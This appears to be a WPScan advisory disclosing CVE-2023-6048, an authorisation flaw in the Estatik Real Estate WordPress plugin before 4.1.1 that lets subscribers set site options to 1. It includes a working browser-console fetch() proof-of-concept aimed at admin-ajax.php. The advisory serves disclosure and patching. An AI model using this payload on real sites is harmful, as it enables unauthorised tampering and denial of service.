WordPress Plugin Vulnerabilities

Estatik Real Estate Plugin < 4.1.1 - Subscriber+ Arbitrary Option Update

Description

The plugin does not prevent user with low privileges on the site, like subscribers, from setting any of the site's options to 1, which could be used to break sites and lead to DoS when certain options are reset

Proof of Concept

Run the below command in the developer console of the web browser while being on the blog as a subscriber user:

fetch("/wp-admin/admin-ajax.php?action=es_dismiss_notices", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
   },
  "body": "notice=template",
  "method": "POST",
});

Affects Plugins

Plugin icon
estatik
Fixed in 4.1.1

References

CVE
CVE-2023-6048

Classification

Type
NO AUTHORISATION
OWASP top 10
A5: Broken Access Control
CWE
CWE-862

Miscellaneous

Original Researcher
Krzysztof Zając (CERT PL)
Submitter
Krzysztof Zając (CERT PL)
Submitter website
https://cert.pl
Submitter twitter
cert_polska_en
Verified
Yes
WPVDB ID
74cb07fe-fc82-472f-8c52-859c176d9e51

Timeline

Publicly Published
2023-12-25 (about 4 months ago)
Added
2023-12-25 (about 4 months ago)
Last Updated
2023-12-25 (about 4 months ago)

Other

Published
Title
Published
2023-09-04
Title
TelSender < 1.14.12 - Subscriber+ Settings Update
Published
2024-03-21
Title
AI Post Generator < 3.4 - Subscriber+ Posts Read/Creation/Deletion
Published
2021-12-08
Title
WP Google Map < 1.8.1 - Subscriber+ Arbitrary Post Deletion and Plugin's Settings Update
Published
2023-10-31
Title
WP Customer Reviews < 3.6.7 - Authenticated (Subscriber+) Sensitive Information Exposure
Published
2023-10-29
Title
Grid Plus < 1.3.3 - Subscriber+ Grid Layout Creation/Deletion/Update